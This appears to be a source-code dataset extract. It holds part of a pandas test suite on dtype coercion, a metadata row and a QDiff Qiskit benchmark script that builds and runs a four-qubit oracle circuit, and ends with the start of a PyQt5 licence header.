self._assert_setitem_series_conversion(obj, val, exp, np.bool)
pytest.xfail("TODO_GH12747 The result must be complex")
exp = pd.Series([True, val, True, False])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(1, np.object),
("x", np.object),
],
)
def test_setitem_series_datetime64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01", tz="US/Pacific"), np.object),
(pd.Timestamp("2012-01-01"), np.object),
(1, np.object),
],
)
def test_setitem_series_datetime64tz(self, val, exp_dtype):
tz = "US/Eastern"
obj = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-02", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(pd.Timedelta("12 day"), "timedelta64[ns]"), (1, np.object), ("x", np.object)],
)
def test_setitem_series_timedelta64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timedelta("1 day"),
pd.Timedelta("2 day"),
pd.Timedelta("3 day"),
pd.Timedelta("4 day"),
]
)
assert obj.dtype == "timedelta64[ns]"
exp = pd.Series(
[pd.Timedelta("1 day"), val, pd.Timedelta("3 day"), pd.Timedelta("4 day")]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
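    # The helpers and tests below exercise coercion of the *index* (the
    # assignment key) rather than of the assigned value: an enlarging
    # `temp[loc_key] = 5` appends loc_key to the index, which may upcast
    # the index dtype.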
def _assert_setitem_index_conversion(
self, original_series, loc_key, expected_index, expected_dtype
):
""" test index's coercion triggered by assign key """
temp = original_series.copy()
temp[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
temp = original_series.copy()
temp.loc[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
@pytest.mark.parametrize(
"val,exp_dtype", [("x", np.object), (5, IndexError), (1.1, np.object)]
)
def test_setitem_index_object(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], index=list("abcd"))
assert obj.index.dtype == np.object
if exp_dtype is IndexError:
temp = obj.copy()
with pytest.raises(exp_dtype):
temp[5] = 5
else:
exp_index = pd.Index(list("abcd") + [val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, np.int64), (1.1, np.float64), ("x", np.object)]
)
def test_setitem_index_int64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4])
assert obj.index.dtype == np.int64
exp_index = pd.Index([0, 1, 2, 3, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, IndexError), (5.1, np.float64), ("x", np.object)]
)
def test_setitem_index_float64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], index=[1.1, 2.1, 3.1, 4.1])
assert obj.index.dtype == np.float64
if exp_dtype is IndexError:
# float + int -> int
temp = obj.copy()
with pytest.raises(exp_dtype):
temp[5] = 5
pytest.xfail("TODO_GH12747 The result must be float")
exp_index = pd.Index([1.1, 2.1, 3.1, 4.1, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
def test_setitem_series_period(self):
pass
def test_setitem_index_complex128(self):
pass
def test_setitem_index_bool(self):
pass
def test_setitem_index_datetime64(self):
pass
def test_setitem_index_datetime64tz(self):
pass
def test_setitem_index_timedelta64(self):
pass
def test_setitem_index_period(self):
pass
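# Summary of the behaviour exercised below: Index.insert coerces the result
# dtype to fit the inserted value, e.g. per test_insert_index_int64,
# pd.Int64Index([1, 2, 3, 4]).insert(1, 1.1) yields the float64
# pd.Index([1.0, 1.1, 2.0, 3.0, 4.0]).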
class TestInsertIndexCoercion(CoercionBase):
klasses = ["index"]
method = "insert"
def _assert_insert_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by insert """
target = original.copy()
res = target.insert(1, value)
tm.assert_index_equal(res, expected)
assert res.dtype == expected_dtype
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, np.object),
(1.1, 1.1, np.object),
(False, False, np.object),
("x", "x", np.object),
],
)
def test_insert_index_object(self, insert, coerced_val, coerced_dtype):
obj = pd.Index(list("abcd"))
assert obj.dtype == np.object
exp = pd.Index(["a", coerced_val, "b", "c", "d"])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, np.int64),
(1.1, 1.1, np.float64),
(False, 0, np.int64),
("x", "x", np.object),
],
)
def test_insert_index_int64(self, insert, coerced_val, coerced_dtype):
obj = pd.Int64Index([1, 2, 3, 4])
assert obj.dtype == np.int64
exp = pd.Index([1, coerced_val, 2, 3, 4])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1.0, np.float64),
(1.1, 1.1, np.float64),
(False, 0.0, np.float64),
("x", "x", np.object),
],
)
def test_insert_index_float64(self, insert, coerced_val, coerced_dtype):
obj = pd.Float64Index([1.0, 2.0, 3.0, 4.0])
assert obj.dtype == np.float64
exp = pd.Index([1.0, coerced_val, 2.0, 3.0, 4.0])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
],
ids=["datetime64", "datetime64tz"],
)
def test_insert_index_datetimes(self, fill_val, exp_dtype):
obj = pd.DatetimeIndex(
["2011-01-01", "2011-01-02", "2011-01-03", "2011-01-04"], tz=fill_val.tz
)
assert obj.dtype == exp_dtype
exp = pd.DatetimeIndex(
["2011-01-01", fill_val.date(), "2011-01-02", "2011-01-03", "2011-01-04"],
tz=fill_val.tz,
)
self._assert_insert_conversion(obj, fill_val, exp, exp_dtype)
if fill_val.tz:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
msg = "Timezones don't match"
with pytest.raises(ValueError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
else:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
msg = "cannot insert DatetimeIndex with incompatible label"
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
pytest.xfail("ToDo: must coerce to object")
def test_insert_index_timedelta64(self):
obj = pd.TimedeltaIndex(["1 day", "2 day", "3 day", "4 day"])
assert obj.dtype == "timedelta64[ns]"
# timedelta64 + timedelta64 => timedelta64
exp = pd.TimedeltaIndex(["1 day", "10 day", "2 day", "3 day", "4 day"])
self._assert_insert_conversion(
obj, pd.Timedelta("10 day"), exp, "timedelta64[ns]"
)
# ToDo: must coerce to object
msg = "cannot insert TimedeltaIndex with incompatible label"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
# ToDo: must coerce to object
msg = "cannot insert TimedeltaIndex with incompatible label"
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(pd.Period("2012-01", freq="M"), "2012-01", "period[M]"),
(pd.Timestamp("2012-01-01"), pd.Timestamp("2012-01-01"), np.object),
(1, 1, np.object),
("x", "x", np.object),
],
)
def test_insert_index_period(self, insert, coerced_val, coerced_dtype):
obj = pd.PeriodIndex(["2011-01", "2011-02", "2011-03", "2011-04"], freq="M")
assert obj.dtype == "period[M]"
data = [
pd.Period("2011-01", freq="M"),
coerced_val,
pd.Period("2011-02", freq="M"),
pd.Period("2011-03", freq="M"),
pd.Period("2011-04", freq="M"),
]
if isinstance(insert, pd.Period):
exp = pd.PeriodIndex(data, freq="M")
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
else:
msg = r"Unexpected keyword arguments {'freq'}"
with pytest.raises(TypeError, match=msg):
pd.Index(data, freq="M")
def test_insert_index_complex128(self):
pass
def test_insert_index_bool(self):
pass
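# obj.where(cond, other) keeps obj where cond is True and takes the fill
# value elsewhere; the tests below check the dtype of the result, e.g. an
# int64 container filled with 1.1 upcasts to float64, while filling with a
# bool falls back to object.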
class TestWhereCoercion(CoercionBase):
method = "where"
def _assert_where_conversion(
self, original, cond, values, expected, expected_dtype
):
""" test coercion triggered by where """
target = original.copy()
res = target.where(cond, values)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.object)],
)
def test_where_object(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
obj = klass(list("abcd"))
assert obj.dtype == np.object
cond = klass([True, False, True, False])
if fill_val is True and klass is pd.Series:
ret_val = 1
else:
ret_val = fill_val
exp = klass(["a", ret_val, "c", ret_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(fill_val * x for x in [5, 6, 7, 8])
exp = klass(["a", values[1], "c", values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, np.object)],
)
def test_where_int64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1, 2, 3, 4])
assert obj.dtype == np.int64
cond = klass([True, False, True, False])
exp = klass([1, fill_val, 3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1, values[1], 3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val, exp_dtype",
[
(1, np.float64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_where_float64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
cond = klass([True, False, True, False])
exp = klass([1.1, fill_val, 3.3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1.1, values[1], 3.3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_where_series_complex128(self, fill_val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
cond = pd.Series([True, False, True, False])
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([1 + 1j, values[1], 3 + 3j, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.bool)],
)
def test_where_series_bool(self, fill_val, exp_dtype):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool
cond = pd.Series([True, False, True, False])
exp = pd.Series([True, fill_val, True, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([True, values[1], True, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), np.object),
],
ids=["datetime64", "datetime64tz"],
)
def test_where_series_datetime64(self, fill_val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Series([True, False, True, False])
exp = pd.Series(
[pd.Timestamp("2011-01-01"), fill_val, pd.Timestamp("2011-01-03"), fill_val]
)
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
values = pd.Series(pd.date_range(fill_val, periods=4))
if fill_val.tz:
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02 00:00", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04 00:00", tz="US/Eastern"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
values[1],
pd.Timestamp("2011-01-03"),
values[3],
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
def test_where_index_datetime(self):
fill_val = pd.Timestamp("2012-01-01")
exp_dtype = "datetime64[ns]"
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
msg = "Index\\(\\.\\.\\.\\) must be called with a collection of some kind"
with pytest.raises(TypeError, match=msg):
obj.where(cond, fill_val)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.xfail(reason="GH 22839: do not ignore timezone, must be object")
def test_where_index_datetimetz(self):
fill_val = pd.Timestamp("2012-01-01", tz="US/Eastern")
exp_dtype = np.object
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
msg = "Index\\(\\.\\.\\.\\) must be called with a collection of some kind"
with pytest.raises(TypeError, match=msg):
obj.where(cond, fill_val)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04", tz="US/Eastern"),
],
dtype=exp_dtype,
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
def test_where_index_complex128(self):
pass
def test_where_index_bool(self):
pass
def test_where_series_datetime64tz(self):
pass
def test_where_series_timedelta64(self):
pass
def test_where_series_period(self):
pass
def test_where_index_datetime64tz(self):
pass
def test_where_index_timedelta64(self):
pass
def test_where_index_period(self):
pass
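# fillna follows coercion rules analogous to setitem: per test_fillna_float64
# below, filling a float64 container with 1 + 1j gives complex128 for a
# Series but object for an Index, since a complex Index is not supported.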
class TestFillnaSeriesCoercion(CoercionBase):
# not indexing, but place here for consistency
method = "fillna"
def test_has_comprehensive_tests(self):
pass
def _assert_fillna_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by fillna """
target = original.copy()
res = target.fillna(value)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val, fill_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.object)],
)
def test_fillna_object(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(["a", np.nan, "c", "d"])
assert obj.dtype == np.object
exp = klass(["a", fill_val, "c", "d"])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(1, np.float64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_fillna_float64(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass([1.1, np.nan, 3.3, 4.4])
assert obj.dtype == np.float64
exp = klass([1.1, fill_val, 3.3, 4.4])
        # float + complex -> complex128 for a Series, but object for an
        # Index, since a complex Index dtype is not supported
if fill_dtype == np.complex128 and klass == pd.Index:
fill_dtype = np.object
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_fillna_series_complex128(self, fill_val, fill_dtype):
obj = pd.Series([1 + 1j, np.nan, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, 4 + 4j])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), np.object),
(1, np.object),
("x", np.object),
],
ids=["datetime64", "datetime64tz", "object", "object"],
)
def test_fillna_datetime(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(
[
pd.Timestamp("2011-01-01"),
pd.NaT,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = klass(
[
pd.Timestamp("2011-01-01"),
fill_val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01"), np.object),
(pd.Timestamp("2012-01-01", tz="Asia/Tokyo"), np.object),
(1, np.object),
("x", np.object),
],
)
def test_fillna_datetime64tz(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
tz = "US/Eastern"
obj = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.NaT,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
fill_val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
def test_fillna_series_int64(self):
pass
def test_fillna_index_int64(self):
pass
def test_fillna_series_bool(self):
pass
def test_fillna_index_bool(self):
pass
def test_fillna_series_timedelta64(self):
pass
def test_fillna_series_period(self):
pass
def test_fillna_index_timedelta64(self):
pass
def test_fillna_index_period(self):
pass
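# `rep` below maps each dtype key to a pair of sample values; the
# test_replace_series* tests build the replacer either as a dict {old: new}
# or as a Series of new values indexed by the old values.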
class TestReplaceSeriesCoercion(CoercionBase):
klasses = ["series"]
method = "replace"
rep: Dict[str, List] = {}
rep["object"] = ["a", "b"]
rep["int64"] = [4, 5]
rep["float64"] = [1.1, 2.2]
rep["complex128"] = [1 + 1j, 2 + 2j]
rep["bool"] = [True, False]
rep["datetime64[ns]"] = [pd.Timestamp("2011-01-01"), pd.Timestamp("2011-01-03")]
for tz in ["UTC", "US/Eastern"]:
# to test tz => different tz replacement
key = "datetime64[ns, {0}]".format(tz)
rep[key] = [
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
]
rep["timedelta64[ns]"] = [pd.Timedelta("1 day"), pd.Timedelta("2 day")]
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
ids=[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"datetime64tz",
"timedelta64",
],
)
@pytest.mark.parametrize(
"from_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
)
def test_replace_series(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xxx")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if from_key.startswith("datetime") and to_key.startswith("datetime"):
# tested below
return
elif from_key in ["datetime64[ns, US/Eastern]", "datetime64[ns, UTC]"]:
# tested below
return
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
if (from_key == "float64" and to_key in ("int64")) or (
from_key == "complex128" and to_key in ("int64", "float64")
):
if compat.is_platform_32bit() or compat.is_platform_windows():
pytest.skip(
"32-bit platform buggy: {0} -> {1}".format(from_key, to_key)
)
# Expected: do not downcast by replacement
exp = pd.Series(self.rep[to_key], index=index, name="yyy", dtype=from_key)
else:
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["timedelta64[ns]", "bool", "object", "complex128", "float64", "int64"],
)
@pytest.mark.parametrize(
"from_key", ["datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"]
)
def test_replace_series_datetime_tz(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
@pytest.mark.parametrize(
"from_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
def test_replace_series_datetime_datetime(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
def test_replace_series_period(self):
pass
| [
"[email protected]"
] | |
4728310efd0b4e2eaa6e3535d1903dc3d22b7567 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_QC2091.py | 737923b2439c1fa807fa1cda167fcd2579578343 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,252 | py | # qubit number=4
# total number=35
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
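# Note: in __main__ below the oracle function is
#   f(x) = bitwise_xor(bitwise_dot(a, x), b), i.e. the parity (a . x + b) % 2,
# a Bernstein-Vazirani-style hidden-string oracle.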
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
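# build_oracle enumerates all 2 ** n inputs; for each input with f == "1" it
# sandwiches a multi-controlled Toffoli between X gates so that the target
# qubit is flipped exactly for that bit pattern.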
def make_circuit(n: int, f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=15
prog.cz(input_qubit[0],input_qubit[3]) # number=16
prog.h(input_qubit[3]) # number=17
prog.x(input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=20
prog.cz(input_qubit[0],input_qubit[3]) # number=21
prog.h(input_qubit[3]) # number=22
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[1]) # number=29
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.h(input_qubit[0]) # number=23
prog.cz(input_qubit[2],input_qubit[0]) # number=24
prog.h(input_qubit[0]) # number=25
prog.y(input_qubit[2]) # number=30
prog.cx(input_qubit[2],input_qubit[0]) # number=11
prog.cx(input_qubit[2],input_qubit[0]) # number=18
prog.h(input_qubit[0]) # number=26
prog.cx(input_qubit[0],input_qubit[2]) # number=32
prog.x(input_qubit[2]) # number=33
prog.cx(input_qubit[0],input_qubit[2]) # number=34
prog.cz(input_qubit[2],input_qubit[0]) # number=27
prog.h(input_qubit[0]) # number=28
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
    sample_shot = 8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC2091.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"[email protected]"
] | |
bda335ed88fe441e1737f4dd3b25d75487239999 | 4da852082af72bd25f5c7016ab781d544aa3d88d | /PyQt5/uic/port_v2/load_plugin.py | 5c141ba81b810cbd6d172000529dcda39e31574a | [] | no_license | pyqt/python-qt5-mavericks | 9241ba98d63a76d1d0a490e8095e7b1d25158f8c | ffb84f9c3f0fc277cdf06a0ae430219987cf9ab4 | refs/heads/master | 2021-01-01T16:21:16.360643 | 2015-04-13T15:30:47 | 2015-04-13T15:30:47 | 33,808,029 | 4 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,519 | py | #############################################################################
##
## Copyright (c) 2015 Riverbank Computing Limited <[email protected]>
##
## This file is part of PyQt5.
##
## This file may be used under the terms of the GNU General Public License
## version 3.0 as published by the Free Software Foundation and appearing in
